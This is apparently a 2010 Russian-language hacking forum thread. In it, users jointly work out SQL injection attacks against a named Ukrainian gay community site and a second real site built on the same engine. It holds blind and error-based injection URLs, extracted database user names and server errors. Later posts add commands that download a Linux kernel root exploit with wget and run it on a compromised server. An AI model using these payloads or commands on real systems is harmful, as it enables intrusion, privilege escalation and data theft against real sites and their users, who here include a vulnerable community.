08.05.2010, 14:05
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
http://gay.ks.ua/links.php?catid=32+order+by+4--
http://gay.ks.ua/links.php?catid=-32+union+select+1,2,3,4--
колонки не видны
ищи скул в другом скрипте
вот еще инфа
http://gay.ks.ua/links.php?catid=32+and+substring(user(),1,1)=char( 103)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),2,1)=char( 97)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),3,1)=char( 121)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),4,1)=char( 107)
http://gay.ks.ua/links.php?catid=32+and+substring(user(),5,1)=char( 115)
юзер-gayks
http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile _os,1,1)=char(112)
http://gay.ks.ua/links.php?catid=32+and+substring(@@version_compile _os,2,1)=char(99)
думаю ос pc-linux
Последний раз редактировалось Konqi; 08.05.2010 в 14:31..
|
|
|
08.05.2010, 14:36
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
С нами:
9509918
Репутация:
30
|
|
http://gay.ks.ua/links.php?catid=32 order by 5
=>
Unknown column '5' in 'order clause'
=> по идее можно выводить данные через ошибку
|
|
|
|
08.05.2010, 14:39
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от DrakonHaSh
http://gay.ks.ua/links.php?catid=32 order by 5
=>
Unknown column '5' in 'order clause'
=> по идее можно выводить данные через ошибку
на пример
|
|
|
|
08.05.2010, 14:59
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
С нами:
9509918
Репутация:
30
|
|
я про то, что вывод ошибки можно поймать
а вот использовать методы из Вывод информации в ошибке для MySQL всех версий у меня не получилось. может у вас получится 
http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM mysql.users
=>
SELECT command denied to user: 'gayks_admin@localhost' for table 'users'
http://gay.ks.ua/links.php?catid=32 UNION SELECT * FROM users
=>
Table 'gayks_phorum.users' doesn't exist
прогнал тулзой пашкелы подбор таблиц (без префикса), нашла только одну - video:
http://gay.ks.ua/links.php?catid=32 UNION SELECT id FROM video
=>
The used SELECT statements have a different number of columns
Последний раз редактировалось DrakonHaSh; 08.05.2010 в 16:16..
|
|
|
|
08.05.2010, 15:18
|
|
Познающий
Регистрация: 24.04.2007
Сообщений: 92
С нами:
10025299
Репутация:
412
|
|
В связи с открытием блога, достаю из недр античата ещё один обнаруженный мной метод, который работает для MySQL всех версий начиная с 4.1 .
gay.ks.ua/links.php?catid=32+and+substring(@@version,1,2)= 4.0
|
|
|
|
08.05.2010, 15:24
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
database() - gayks
щас всем народом будем взломать гей портал
|
|
|
|
08.05.2010, 16:28
|
|
Познающий
Регистрация: 16.04.2008
Сообщений: 88
С нами:
9509918
Репутация:
30
|
|
заметил у них на на форуме:
Copyright BOY-UANIC 2002-2010
сходил в гугл, нашел это:
http://www.eu-football.info/_links.php?catid=10 and+substring(version(),1,1)=5
т.е. тот же движ, но mysql - 5-ка, соответственно в ней скорее всего можно все, что надо, подсмотреть
балин, и тут облом 
http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select +version()),floor(rand(0)* 2))+from+information_schema.tables+group+by+2)a)--+
=>
SELECT command denied to user 'gbua_f00t'@'213.186.117.208' for table 'tables'
а вот таблица video и здесь присутствует:
http://www.eu-football.info/_links.php?catid=10 and+(select+1+from+(select+count(0),concat((select +version()),floor(rand(0)* 2))+from+video+group+by+2)a)--+
=>
Duplicate entry '5.0.45-community-nt-log1' for key 1
Последний раз редактировалось DrakonHaSh; 08.05.2010 в 16:37..
|
|
|
|
08.05.2010, 17:27
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
С нами:
8854580
Репутация:
34
|
|
всем доброго времени суток.
вопрос - есть сервер Linux 2.6.10-1.771_FC2smp #1 SMP Mon Mar 28 01:10:51 EST 2005 i686
скачал скомпилированный эксплойт Krad отсюда http://files.xakep.biz/Local_Root_Exploits/krad
запускаю ./exploit
получаю ошибку: [6658: 3] tcsetattr: Invalid argument
эээ...что не так ?
|
|
|
|
08.05.2010, 17:28
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz
|
|
|
|
08.05.2010, 23:02
|
|
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
С нами:
9100556
Репутация:
912
|
|
Сообщение от daniel_1024
скажите что можно сделать ,если на сервере не включено gcc (нельзя сплойты компилировать). можно их уже в скомпилированном виде загружать?
http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
http://milw0rm.com/sploits/2009-linux-sendpage2.tar.gz
wget http://milw0rm.com/sploits/2009-linux-sendpage3.tar.gz
tar xvfz 2009-linux-sendpage3.tar.gz
chmod 777 linux-sendpage3 -R
cd linux-sendpage3
./run
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2130496){kind=avatar}
![Аватар для .:[melkiy]:.](/avatars/avatar74910.jpg?2131203){kind=avatar}
Похожие темы
Комбинированный вид
